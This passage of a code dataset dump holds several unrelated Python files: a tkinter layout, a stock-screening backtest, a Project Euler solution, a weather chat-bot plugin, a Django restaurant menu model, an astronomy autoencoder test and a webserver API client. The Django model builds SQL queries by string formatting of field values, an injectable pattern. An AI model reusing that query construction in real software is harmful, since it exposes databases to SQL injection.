sticky='ew')\ncombo_occupation.grid(column=0, row=2, columnspan=2, sticky='new')\n\nroot.columnconfigure(0, weight=1)\nroot.rowconfigure(0, weight=1)\nframe.columnconfigure(1, weight=1)\nframe.rowconfigure(2, weight=1)\n#\n# dirname = filedialog.askopenfile()\n# print(dirname)\n#\n# messagebox.askquestion(\"Hi there.\", message=\"This is nice isn't it?\", icon='question')\n\nroot.mainloop()\n","sub_path":"gui/tk_layout2.py","file_name":"tk_layout2.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"55624515","text":"#Get the projected total sales\r\ntotal_sales = float(input('Enter the projected sales:'))\r\n#Calculatethe profit as 23 percent of total sales\r\nannualprofit = total_sales* .23\r\n#Display the profit\r\nprint('The profit is $',format(annualprofit,',.2f'))\r\n\r\n#CTI-110\r\n#P2T1 - Sales Prediction\r\n#Toneshia Ried\r\n#February 12, 2018\r\n\r\n","sub_path":"P2T1_SalesPrediction_RiedToneshia.py","file_name":"P2T1_SalesPrediction_RiedToneshia.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"132991965","text":"import os\nimport time\nimport akshare as ak\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport requests\n\nfrom sklearn.linear_model import LinearRegression\nfrom funcat import *\nfrom funcat.account import Account\nfrom funcat.context import ExecutionContext as funcat_execution_context\n\n\n# 当前股价比最近m天股价最高点下跌n-1\ndef select_down_from_max(m, n):\n return COUNT(HHV(H, 5) / L >= n, m) >= 1\n\n\ndef select_by_volume(n):\n d = IF(O > C, V, 0)\n u = IF(O > C, 0, V)\n d_max = HHV(d, n)\n u_max = HHV(u, n)\n return d_max < u_max\n\n\n# 通达信八仙过海买入指标,趋势跟随\ndef select_buy_signal(n):\n return ((ZIG(C[n], 6) > REF(ZIG(C[n], 6), 1) and REF(ZIG(C[n], 6), 1) <= REF(ZIG(C[n], 6), 2) <= REF(\n ZIG(C[n], 6), 3) or (\n ZIG(C[n], 22) > REF(ZIG(C[n], 22), 1) and REF(ZIG(C[n], 22), 1) <= REF(ZIG(C[n], 22), 2) <= REF(ZIG(C[n], 22),\n 3))))\n\n\n# n天内存在第一次高于收盘价高于5\\13\\21\\34\\55日线\ndef select_over_average(n):\n candidate = 0\n for i in range(n):\n ma5 = MA(C[i], 5)\n ma13 = MA(C[i], 13)\n ma21 = MA(C[i], 21)\n ma34 = MA(C[i], 34)\n ma55 = MA(C[i], 55)\n if REF(C[i], 0) < ma5 or REF(C[i], 0) < ma13 or REF(C[i], 0) < ma21 or REF(C[i], 0) < ma34 or REF(C[i], 0) < ma55:\n continue\n\n ret = (COUNT((C[i] > MA(C[i], 5)) & (C[i] > MA(C[i], 13)) & (C[i] > MA(C[i], 21)) & (C[i] > MA(C[i], 34)) & (C[i] > MA(C[i], 55)), n) == 1)\n # print(i, ret, candidate, get_current_date(), select_by_volume(21), COUNT(select_buy_signal(0), 34), COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55))\n if ret and select_by_volume(21) and COUNT(select_buy_signal(0), 34) >= 1 and (COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55) >= 4):\n _, peers = zig_helper(C.series[-(i+1):], 7)\n # print(i, ret, candidate, peers, get_current_date(), select_by_volume(13), COUNT(select_buy_signal(0), 15), COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55))\n if len(peers) <= 3:\n candidate = candidate + 1\n # print(candidate, get_current_date(), symbol(get_current_security()), i, ma55, peers)\n # print(C.series[-(i+1):])\n # if ret:\n # print(get_current_date(), symbol(get_current_security()), \"突破5\\\\13\\\\21\\\\34\\\\55日均线\", C, ma5)\n\n return candidate == 1\n\n\ndef select_macd_cross_up():\n diff = EMA(C, 12) - EMA(C, 26)\n dea = EMA(diff, 9)\n macd = 2 * (diff - dea)\n\n x_train = []\n y_train = []\n for i in range(100):\n if macd[i] > 0 and macd[i + 1] < 0:\n x_train.append(i)\n y_train.append(diff[i].value)\n\n if len(x_train) == 3:\n break\n\n x_train.reverse()\n y_train.reverse()\n x_train = list(map(lambda i: -i + max(x_train), x_train))\n if len(x_train) != 3:\n return -np.nan\n\n model = LinearRegression()\n model.fit(np.array(x_train).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n coef = model.coef_\n return coef\n\n\n# 长期均线34\\55连续n天形成上升趋势\ndef select_long_average_up(n):\n model = LinearRegression()\n y_train = []\n for i in range(n - 1, -1, -1):\n y_train.append(MA(C[i], 34).value)\n try:\n model.fit(np.array(range(len(y_train))).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n except Exception as e:\n print(e, y_train)\n ma34_coef = model.coef_\n\n # print(ma34_coef, y_train)\n y_train = []\n for i in range(n - 1, -1, -1):\n y_train.append(MA(C[i], 55).value)\n try:\n model.fit(np.array(range(len(y_train))).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n except Exception as e:\n print(e, y_train)\n ma55_coef = model.coef_\n\n # print(ma55_coef, y_train)\n return ma34_coef > 0. or ma55_coef > 0.\n\n\ndef callback(date, order_book_id, sym):\n rw = sym + \" \"\n ccnt = 0\n tcnt = 0\n uup = 0\n time_tmp = \"\"\n # trading_dates not include today for cache issue\n # 计算7年内选股策略盈利的次数,以及最大盈利比例\n for itr, time in enumerate(trading_dates[:-7]):\n T(time)\n try:\n if select_over_average(31) and select_long_average_up(2):\n if time_tmp == \"\":\n time_tmp = time\n elif int(time) - int(time_tmp) < 23: # interval between adjacent choosing must large than 23 days\n continue\n\n tcnt = tcnt + 1\n cur_price = C.value\n max_price = C.value\n max_dates = itr + 30\n if itr + 30 >= len(trading_dates):\n max_dates = len(trading_dates)\n for it in range(itr, max_dates, 1):\n T(trading_dates[it])\n if C.value > max_price:\n max_price = C.value\n\n # regards profit if boom 4%\n if max_price > cur_price * 1.04:\n ccnt = ccnt + 1\n uup = int(round((max_price - cur_price) / cur_price, 2) * 100)\n except Exception as e:\n continue\n\n # set trade date to the origin value.\n T(date)\n\n if ccnt != 0:\n rw = rw + \" 2015年至今选中\" + str(tcnt) + \"次,准确\" + str(ccnt) + \"次,最高盈利\" + str(uup) + \"%\"\n print(date, rw)\n\n with open('hk_daily_stock', 'a+') as fp:\n fp.write(rw + \"\\n\")\n\n\nday = (datetime.datetime.now() + datetime.timedelta(days=0)).strftime('%Y%m%d')\nday0 = (datetime.datetime.now() + datetime.timedelta(days=-3)).strftime('%Y%m%d')\n\nset_data_backend(AkshareHKDataBackend())\ndata_backend = funcat_execution_context.get_data_backend()\ntrading_dates = data_backend.get_trading_dates(\"20150808\", day)\nprint(trading_dates)\norder_book_id_list = data_backend.get_order_book_id_list()\nprint(order_book_id_list)\n\nwith open('hk_daily_stock', 'w') as fp:\n fp.write(\"首次筛选(捕捉短期牛股,30日内5%以上盈利视为准确):\\n\")\n\nselect(\n lambda: select_over_average(31) and select_long_average_up(2),\n start_date=trading_dates[-1],\n end_date=trading_dates[-1],\n callback=callback,\n)\n","sub_path":"for_stocks/choose_stock_hk.py","file_name":"choose_stock_hk.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"39144415","text":"# Project Euler Problem 67\n# https://projecteuler.net/problem=67\n\n# By starting at the top of the triangle below and moving to adjacent numbers on the row below,\n# the maximum total from top to bottom is 23.\n# 3\n# 7 4\n# 2 4 6\n# 8 5 9 3\n# That is, 3 + 7 + 4 + 9 = 23.\n\n# Find the maximum total from top to bottom in triangle.txt, a 15K text file containing a triangle with one-hundred rows.\n\n# NOTE: This is a much more difficult version of Problem 18. It is not possible to try every route to solve this problem, \n# as there are 299 altogether! If you could check one trillion (1012) routes every second it would take over twenty billion \n# years to check them all. There is an efficient algorithm to solve it. ;o)\n\n\n# I am going to copy and paste my code fom Problem 18, changing only the values of arr. Let's see if it works!\n# Algorithm: Similar to minimax in that it bubbles up the highest values from the bottom. Each location of\n#\t\t\t arr will hold the \"value\" of its location. I define the \"value\" of a location to be the sum \n#\t\t\t of itself and the greater of the two values immediately below it.\nimport time\nstart = time.time()\n\n\ntriangle = open(\"text/triangle.txt\", \"r\")\narr = []\n\nfor row in triangle:\n\trow = row.rstrip()\t\t\t\t\t\t\t# Remove newline\n\trow = [int(i) for i in row.split(\" \")]\t\t# Cast to int and store in array\n\tarr.append(row)\t\t\t\t\t\t\t\t# Append row to arr\n\n# Copied code from Problem 18.py\nfor i in reversed(range(0, len(arr)-1) ):\t\t\t\t# For each row, from the second bottom to the top\n\tfor j in range(0, len(arr[i]) ):\t\t\t\t\t# For each element in that row\n\t\tbigger = arr[i+1][j] if arr[i+1][j] > arr[i+1][j+1] else arr[i+1][j+1]\n\t\tarr[i][j] += bigger\n\nprint(arr[0][0])\n\n# Hurray! It worked on the first try!\nprint(time.time()-start)\ntriangle.close()","sub_path":"assets/Euler/Problem67.py","file_name":"Problem67.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"424303039","text":"\"\"\"\nUse forecast.io to get current weather forecast for a given location.\n\nInstructions:\n * Get an API key from https://developer.forecast.io/\n * Store API key in config.json:forecast_api_key\n\"\"\"\n\nimport logging\nimport requests\n\nimport plugins\n\nlogger = logging.getLogger(__name__)\n_internal = {}\n\ndef _initialize(bot):\n api_key = bot.get_config_option('forecast_api_key')\n if api_key:\n _internal['forecast_api_key'] = api_key\n plugins.register_user_command(['forecast'])\n else:\n logger.info('not enabled, need forecast.io API key in config[\"forecast_api_key\"]')\n\n\ndef forecast(bot, event, *args):\n \"\"\"Returns weather information from Forecast.io.\n/bot forecast Get location's current weather.\n/bot forecast Get current weather of last used location.\n/bot forecast unit Set unit to display degrees.\"\"\"\n\n if not bot.memory.exists(['forecast']):\n bot.memory.set_by_path(['forecast'], {})\n\n if not bot.memory.exists(['forecast', event.conv_id]):\n bot.memory.set_by_path(['forecast', event.conv_id], {})\n\n conv_forecast = bot.memory.get_by_path(['forecast', event.conv_id])\n\n unit = conv_forecast.get('unit', 'F')\n _internal['unit'] = unit\n\n # just setting units\n if len(args) == 2 and args[0] == 'unit':\n unit = parse_unit(args[1])\n if unit is None:\n yield from bot.coro_send_message(\n event.conv_id,\n _('{} is not a recognized unit. Try F or C').format(args[1]))\n else:\n _internal['unit'] = unit\n conv_forecast['unit'] = unit\n bot.memory.set_by_path(['forecast', 'unit'], conv_forecast)\n bot.memory.save()\n yield from bot.coro_send_message(\n event.conv_id,\n _('Reporting weather in degrees {}').format(unit))\n return\n\n if args:\n coords = lookup_address(' '.join(args))\n if not coords:\n yield from bot.coro_send_message(\n event.conv_id,\n _('{}: not found').format(' '.join(args)))\n return\n conv_forecast[event.user.id_.chat_id] = coords\n bot.memory.set_by_path(['forecast', event.conv_id], conv_forecast)\n bot.memory.save()\n else:\n coords = conv_forecast.get(event.user.id_.chat_id, None)\n if not coords:\n yield from bot.coro_send_message(\n event.conv_id,\n _('Your location history not found. Use /bot weather address.'))\n return\n yield from bot.coro_send_message(event.conv_id, lookup_weather(coords))\n\n\ndef lookup_address(location):\n \"\"\"\n Retrieve the coordinates of the location.\n\n :params location: string argument passed by user.\n :returns: dictionary containing latitutde and longitude.\n \"\"\"\n google_map_url = 'https://maps.googleapis.com/maps/api/geocode/json'\n payload = {'address': location}\n resp = requests.get(google_map_url, params=payload)\n try:\n resp.raise_for_status()\n results = resp.json()['results'][0]\n return {\n 'lat': results['geometry']['location']['lat'],\n 'lng': results['geometry']['location']['lng'],\n 'address': results['formatted_address']\n }\n except (IndexError, KeyError):\n logger.error('unable to parse address return data: %d: %s', resp.status_code, resp.json())\n return None\n\n\ndef lookup_weather(coords):\n \"\"\"\n Retrieve the current forecast at the coordinates.\n\n :param coords: Dictionary containing latitude and longitude.\n :returns: Dictionary containing parsed current forecast.\n \"\"\"\n\n url = 'https://api.forecast.io/forecast/{}/{},{}'.format(\n _internal['forecast_api_key'], coords['lat'], coords['lng'])\n resp = requests.get(url)\n\n try:\n resp.raise_for_status()\n j = resp.json()['currently']\n except (IndexError, KeyError):\n logger.exception('bad weather results: %d', resp.status_code)\n return _('Unable to parse forecast data.')\n\n unit = _internal.get('unit', 'F')\n temperature = j['temperature'] if unit == 'F' else to_celsius(j['temperature'])\n\n return _('In {}, it is currently {}, {:.0f}{} and {:.0f}% humidity.').format(\n coords['address'], j['summary'].lower(), round(temperature, 0), unit, j['humidity']*100)\n\n\ndef to_celsius(f_temp):\n \"\"\"\n Converts Fahrenheit to Celsius.\n\n :param f_temp: Temperature in degrees Fahrenheit.\n :returns: Temperature in degrees Celsius.\n \"\"\"\n return (f_temp - 32) / 1.8\n\n\ndef parse_unit(unit):\n \"\"\"\n Parses and normalizes user-passed unit of temperature.\n\n :param unit: User-passed unit of temperature.\n :returns: Normalized unit of temperature.\n \"\"\"\n if unit.lower() in ['f', 'fahrenheit']:\n return 'F'\n elif unit.lower() in ['c', 'celsius', 'centigrade']:\n return 'C'\n else:\n return None\n","sub_path":"plugins/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"468254913","text":"from django.db import models\nfrom django.db import connection\nfrom bearbites._con import getConnection\nfrom bearbites._con import dictfetchall\nfrom restaurant.models import Restaurant\n# Create your models here.\nclass Menu(Restaurant):\n menuID = models.IntegerField()\n\n\n def get_menuID(self):\n return menuID\n\n def set_menuID(self,num):\n self.menuID = num\n\n# For Some Reason, GetItemPrice was in Menu instead of MenuItem\n\nclass MenuItem(Menu):\n\n itemID = models.IntegerField()\n itemName = models.CharField(max_length=128)\n itemType = models.CharField(max_length=128)\n itemDescription = models.CharField(max_length=128)\n itemPrice = models.CharField(max_length=128)\n itemDiscount = models.CharField(max_length=128)\n itemImageURL = models.CharField(max_length=128)\n\n# Getter Methods\n def __str__(self):\n return self.itemName\n\n def get_itemID(self):\n return self.itemID\n\n def get_itemName(self):\n return self.itemID\n\n def get_itemType(self):\n return self.itemType\n\n def get_itemDescription(self):\n return self.itemDescription\n\n def get_itemPrice(self):\n return self.itemPrice\n\n def get_itemDiscount(self):\n return self.itemDiscount\n\n def get_itemImageURL(self):\n return self.itemImageURL\n\n# Setter Methods\n def set_itemID(self, num):\n self.itemID = num\n\n def set_itemName(self,name):\n self.itemName = name\n\n def set_itemType(self,type):\n self.itemType = type\n\n def set_itemDescription(self,desc):\n self.itemDescription = desc\n\n def set_itemDiscount(self,dis):\n self.itemDiscount = dis\n\n def set_itemImageURL(self,link):\n self.itemImageURL = link\n\n## Database Queries\n\n# Item Propogration\n def addMenuItem(self):\n try:\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"\" # SQL Query to Execute\n cursor.execute(sql.format()) #Fill the Query with Class Properties\n cnxn.commit()\n cursor.close()\n cnxn.close()\n del cnxn\n response = \"Menu Item succefully created\"\n except:\n response = \"Error creating Menu Item\"\n return response\n\n# Item Deletion\n def deleteMenuItem(self):\n try:\n cnxn = getConnection()\n cursor= cnxn.cursor()\n sql = \"\"\n cursor.execute(sql.format())\n cnxn.commit()\n cursor.close()\n cnxn.close()\n del cnxn\n response = \"Menu Item succesfully deleted\"\n except:\n response = \"Error deleting Menu Item\"\n return response\n\n# Item Querying\n\n#Query by Description\n def viewMenuCategory(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT ItemName,ItemDesc,Price FROM Items WHERE MenuID = {} AND itemType = {};\".format(self.menuID,self.itemType)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n#Query All Menu Items\n def viewMenu(self,menu):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT ItemName,ItemDesc,Price,ItemURL FROM Items WHERE MenuID = {}\".format(menu)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n#Query All Restaurant Items\n def viewItems(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"EXEC ViewRestaurantsItems @Restaurant= {}\".format(self.restaurantID)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n def foodForensics(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT MenuID FROM Items WHERE ItemID = {};\".format(int(self.itemID))\n cursor.execute(sql)\n menu = cursor.fetchall()[0][0]\n sql = \"SELECT Restaurant.RestaurantName FROM Restaurant INNER JOIN Menu ON Restaurant.RestaurantID = Menu.RestaurantID WHERE MenuID = {};\".format(int(menu))\n cursor.execute(sql)\n restaurantName = cursor.fetchall()[0][0]\n sql = \"SELECT ItemName,Price,Discount,ItemURL FROM Items WHERE ItemID = {};\".format(int(self.itemID))\n cursor.execute(sql)\n response = dictfetchall(cursor)\n response[0][\"restaurantName\"] = restaurantName\n return response\n\n#Get an Item's price\n def getItemPrice(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"Select Price FROM Items WHERE ItemID= {}\".format(self.itemID)\n cursor.execute(sql)\n results = cursor.fetchall()\n response = results[-1][0]\n cursor.close()\n cnxn.close()\n del cnxn\n return response\n\n#Get an Item's price\n def getItemRestaurant(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"Select Restaurant.RestaurantID FROM ((Items inner join Menu on Items.MenuID = Menu.MenuID ) inner join Restaurant on Menu.RestaurantID = Restaurant.RestaurantID ) WHERE ItemID={}\".format(self.itemID)\n cursor.execute(sql)\n results = cursor.fetchall()\n response = results[-1][0]\n cursor.close()\n cnxn.close()\n del cnxn\n return response\n","sub_path":"menu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"304574882","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 29 14:21:53 2020\n\n@author: SpaceMeerkat\n\nThis script takes the THINGS moment maps and encodes them using a pretrained\nnetwork. The encodings are then used to create output images for comparison\nto the original moment maps. This is a blind test script and therefore there\nis no GPU coding involved.\n\n\"\"\"\n\n# =============================================================================\n# Import relevant packages\n# =============================================================================\n\nimport glob\nimport numpy as np\nimport pandas as pd\nimport sys\nsys.path.append(\"../utils/\")\nimport torch\nfrom tqdm import tqdm\n\nfrom functions import WISDOM_plotter\nfrom model_int import CAE\nfrom rcparams import rcparams\nrcparams()\nfrom WISDOM_utils import WISDOM_loader as load\n\n# =============================================================================\n# Setup paths\n# =============================================================================\n\nmodel_path = '/path/to/saved/models/'\ndata_path = '/path/to/testing/data/'\nresults_path = 'path/to/save/testing/results/'\nimage_path = '/path/to/save/images/'\n\n# =============================================================================\n# Setup paths\n# =============================================================================\n\nmodel_path = '/path/to/saved/models/'\ndata_path = '/path/to/testing/data/'\nresults_path = 'path/to/save/testing/results/'\nimage_path = '/path/to/save/images/'\nbarolo_path = '/path/to/barolo/rotation/curves/'\n\n# =============================================================================\n# Apply dropout to get the mean and std for learned parameters\n# =============================================================================\n\ndef apply_dropout(m):\n if type(m) == torch.nn.Dropout:\n m.train(True)\n\nmodel = CAE()\nmodel.load_state_dict(torch.load(model_path+'semantic_AE_THINGS_&_KinMS_2.pt'))\nmodel = model.cpu()\nmodel.train(False)\nmodel.apply(apply_dropout)\n\nprint(\"Model cast to CPU\")\n\n# =============================================================================\n# Collect all WISDOM filenames for testing all of them\n# =============================================================================\n\nmom0_filenames = glob.glob(data_path + '*mom0.fits')\nmom0_filenames.sort()\n\nnames = []\nfor i in mom0_filenames:\n name = i.split('/')[-1]\n split = name.split('_')\n if name[0] == 'N':\n names.append(split[0] + '_' + split[1])\n else:\n names.append(split[0])\nnames = np.array(names)\n\nprint(names)\n\n# =============================================================================\n# Collecting the mom0 and mom1 tensors for testing\n# =============================================================================\n\nmom0s, mom1s, pos, cdelts, sizes, vcirc, barolo = load(data_path, barolo_path)\n \nmom0s, mom1s = np.array(mom0s), np.array(mom1s)\n\nmom0s = torch.tensor(mom0s).to(torch.float)\nmom1s = torch.tensor(mom1s).to(torch.float)\n\npos = torch.zeros(mom0s.shape[0]).to(torch.float)\n\nprint(\"Test data created\")\n\n# =============================================================================\n# Collecting blind test WISDOM parameters via encoding\n# =============================================================================\n\npredictions = []\nerrors = []\nfor j in range(mom0s.shape[0]): \n temp_pred = []\n for _ in range(100):\n prediction1 = model.test_encode(mom0s[j].unsqueeze(0),mom1s[j].unsqueeze(0),\n pos[j].unsqueeze(0))\n prediction1 = prediction1.detach().numpy()\n temp_pred.append(prediction1)\n temp_pred = np.vstack(temp_pred)\n mean_pred = np.mean(temp_pred,0)\n predictions.append(mean_pred)\n errors.append(np.sum(np.abs(temp_pred-mean_pred[None,:]),0)/len(temp_pred))\n \nprint(\"Testing data complete\")\n\npredictions = np.vstack(predictions)\nerrors = np.vstack(errors)\n\ndfp = pd.DataFrame(predictions)\ndfe = pd.DataFrame(errors)\ndfn = pd.DataFrame(names)\n\ndf = pd.concat([dfn,dfp,dfe],axis=1)\ndf.columns = ['OBJECT',0,1,2,3,4,5,6,7,8,9]\n\n# =============================================================================\n# Save the results to pickle\n# =============================================================================\n\ndf.to_pickle(results_path + 'THINGS.pkl')\n\n# =============================================================================\n# Put the medians back into the network to get \"out\" images\n# =============================================================================\n\npredictions = torch.tensor(predictions).to(torch.float).unsqueeze(1).unsqueeze(1).unsqueeze(1)\n\nbatch_size = predictions.shape[0] \n\n### Create the auxiliary arrays\nl = torch.arange(0 - 63/2., (63/2.)+1)\nyyy, xxx, zzz = torch.meshgrid(l,l,l)\n\nxxx, yyy, zzz = xxx.repeat(batch_size,1,1,1), yyy.repeat(batch_size,1,1,1), zzz.repeat(batch_size,1,1,1)\nxxx = xxx.to(torch.float)\nyyy = yyy.to(torch.float)\nzzz = zzz.to(torch.float)\n\nmom0s[mom0s<0.001] = 0\nmom1s[mom0s==0] = 0\n\nBRIGHTNESS, VELOCITY, vmax = CAE(xxx,yyy,zzz).test_images(mom0s, mom1s, predictions[:,:,:,:,0], \n predictions[:,:,:,:,1], predictions[:,:,:,:,2], \n predictions[:,:,:,:,3], predictions[:,:,:,:,4],\n predictions[:,:,:,:,0]*0 + 1, shape=64)\n\n# =============================================================================\n# Plot the images\n# =============================================================================\n\nfor i in tqdm(range(mom0s.shape[0])):\n WISDOM_plotter(sizes,mom0s.squeeze(1).numpy(),mom1s.squeeze(1).numpy(),\n BRIGHTNESS.squeeze(1),VELOCITY.squeeze(1),\n dfp.values,dfe.values, i, vcirc,\n save_path = '/home/anubis/c1307135/Corellia/THINGS/Pred_images/'+dfn.iloc[i].values[0]+'.pdf',\n barolo=barolo)\n \n# =============================================================================\n# End of script\n# =============================================================================\n\n","sub_path":"testing/THINGS_tester.py","file_name":"THINGS_tester.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"119943289","text":"import base64\nimport json\nimport logging\nfrom collections import deque\nfrom contextlib import suppress\nfrom typing import Deque, Dict, List, Optional\nfrom uuid import UUID\n\nimport attr\nfrom cryptography import fernet\nfrom fastapi import FastAPI, HTTPException\nfrom httpx import AsyncClient, Response, codes\nfrom pydantic import ValidationError\nfrom starlette import status\n\nfrom ..core.settings import WebServerSettings\nfrom ..models.domain.projects import NewProjectIn, Project\nfrom ..models.raw_data import JSON, ListAnyDict\nfrom ..utils.client_base import BaseServiceClientApi, setup_client_instance\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s(auto_attribs=True)\nclass AuthSession:\n \"\"\"\n - wrapper around thin-client to simplify webserver's API\n - sets endspoint upon construction\n - MIME type: application/json\n - processes responses, returning data or raising formatted HTTP exception\n - The lifetime of an AuthSession is ONE request.\n\n SEE services/api-server/src/simcore_service_api_server/api/dependencies/webserver.py\n \"\"\"\n\n client: AsyncClient # Its lifetime is attached to app\n vtag: str\n session_cookies: Dict = None\n\n @classmethod\n def create(cls, app: FastAPI, session_cookies: Dict):\n return cls(\n client=app.state.webserver_client,\n vtag=app.state.settings.API_SERVER_WEBSERVER.WEBSERVER_VTAG,\n session_cookies=session_cookies,\n )\n\n @classmethod\n def _process(cls, resp: Response) -> Optional[JSON]:\n # enveloped answer\n data, error = None, None\n try:\n body = resp.json()\n data, error = body.get(\"data\"), body.get(\"error\")\n except (json.JSONDecodeError, KeyError):\n logger.warning(\"Failed to unenvelop webserver response\", exc_info=True)\n\n if codes.is_server_error(resp.status_code):\n logger.error(\n \"webserver error %d [%s]: %s\",\n resp.status_code,\n resp.reason_phrase,\n error,\n )\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE)\n\n if codes.is_client_error(resp.status_code):\n msg = error or resp.reason_phrase\n raise HTTPException(resp.status_code, detail=msg)\n\n return data\n\n # OPERATIONS\n # TODO: refactor and code below\n # TODO: policy to retry if NetworkError/timeout?\n # TODO: add ping to healthcheck\n\n async def get(self, path: str) -> Optional[JSON]:\n url = path.lstrip(\"/\")\n try:\n resp = await self.client.get(url, cookies=self.session_cookies)\n except Exception as err:\n # FIXME: error handling\n logger.exception(\"Failed to get %s\", url)\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE) from err\n\n return self._process(resp)\n\n async def put(self, path: str, body: Dict) -> Optional[JSON]:\n url = path.lstrip(\"/\")\n try:\n resp = await self.client.put(url, json=body, cookies=self.session_cookies)\n except Exception as err:\n logger.exception(\"Failed to put %s\", url)\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE) from err\n\n return self._process(resp)\n\n # PROJECTS resource ---\n # TODO: error handling!\n\n async def create_project(self, project: NewProjectIn):\n resp = await self.client.post(\n \"/projects\",\n params={\"hidden\": True},\n data=project.json(\n by_alias=True, exclude={\"state\"}\n ), ## FIXME: REEAAAALY HACKY!\n cookies=self.session_cookies,\n )\n\n data: Optional[JSON] = self._process(resp)\n return Project.parse_obj(data)\n\n async def get_project(self, project_id: UUID) -> Project:\n resp = await self.client.get(\n f\"/projects/{project_id}\", cookies=self.session_cookies\n )\n\n data: Optional[JSON] = self._process(resp)\n return Project.parse_obj(data)\n\n async def list_projects(self, solver_name: str) -> List[Project]:\n # TODO: pagination?\n resp = await self.client.get(\n \"/projects\",\n params={\"type\": \"user\", \"show_hidden\": True},\n cookies=self.session_cookies,\n )\n\n data: ListAnyDict = self._process(resp) or []\n\n # FIXME: move filter to webserver API (next PR)\n projects: Deque[Project] = deque()\n for prj in data:\n possible_job_name = prj.get(\"name\", \"\")\n if possible_job_name.startswith(solver_name):\n try:\n projects.append(Project.parse_obj(prj))\n except ValidationError as err:\n logger.warning(\n \"Invalid prj %s [%s]: %s\", prj.get(\"uuid\"), solver_name, err\n )\n\n return list(projects)\n\n\ndef _get_secret_key(settings: WebServerSettings):\n secret_key_bytes = settings.WEBSERVER_SESSION_SECRET_KEY.get_secret_value().encode(\n \"utf-8\"\n )\n while len(secret_key_bytes) < 32:\n secret_key_bytes += secret_key_bytes\n secret_key = secret_key_bytes[:32]\n\n if isinstance(secret_key, str):\n pass\n elif isinstance(secret_key, (bytes, bytearray)):\n secret_key = base64.urlsafe_b64encode(secret_key)\n return secret_key\n\n\nclass WebserverApi(BaseServiceClientApi):\n \"\"\"Access to web-server API\"\"\"\n\n # def create_auth_session(self, session_cookies) -> AuthSession:\n # \"\"\" Needed per request, so it can perform \"\"\"\n # return AuthSession(client=self.client, vtag=\"v0\", session_cookies=session_cookies)\n\n\n# MODULES APP SETUP -------------------------------------------------------------\n\n\ndef setup(app: FastAPI, settings: Optional[WebServerSettings] = None) -> None:\n if not settings:\n settings = WebServerSettings()\n\n assert settings is not None # nosec\n\n setup_client_instance(\n app, WebserverApi, api_baseurl=settings.base_url, service_name=\"webserver\"\n )\n\n # TODO: old startup. need to integrat\n # TODO: init client and then build sessions from client using depenencies\n\n def on_startup() -> None:\n # normalize & encrypt\n secret_key = _get_secret_key(settings)\n app.state.webserver_fernet = fernet.Fernet(secret_key)\n\n # init client\n logger.debug(\"Setup webserver at %s...\", settings.base_url)\n\n client = AsyncClient(base_url=settings.base_url)\n app.state.webserver_client = client\n\n async def on_shutdown() -> None:\n with suppress(AttributeError):\n client: AsyncClient = app.state.webserver_client\n await client.aclose()\n del app.state.webserver_client\n logger.debug(\"Webserver closed successfully\")\n\n app.add_event_handler(\"startup\", on_startup)\n app.add_event_handler(\"shutdown\", on_shutdown)\n","sub_path":"services/api-server/src/simcore_service_api_server/modules/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":6872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"591318551","text":"################################################################################\n# NAME : model_test.py\n# DATE STARTED : July 5, 2020\n# AUTHORS : Benjamin Vaughan, Teresa Symons\n# PURPOSE : The purpose of this script is to test that the map we recreate using\n# the best fit params from Planck agree with their model.\n# Run it N times for N means of the image instead of a single image\n# EXPLANATION :\n# CALLING SEQUENCE :\n# INPUTS :\n#\n#\n# OUTPUTS :\n# REVISION HISTORY :\n################################################################################\nimport sys\nimport os\nfrom astropy.io import fits\nsys.path.append('../')\nfrom utilities import *\nfrom make_map import *\nimport numpy as np\nfrom astropy.wcs.utils import pixel_to_skycoord, skycoord_to_pixel\nfrom astropy.wcs import WCS as world\nfrom astropy import units as u\nfrom astropy.constants import c\nfrom scipy import io\nfrom joblib import Parallel, delayed\nfrom multiprocessing import cpu_count\n\n# Flag to tell make_map if varying parameters by error or not\nFLG_err = 1\n\n# Number of times to run this script, hard-coded\nN = 100\nseed = 1776\n\nlam = 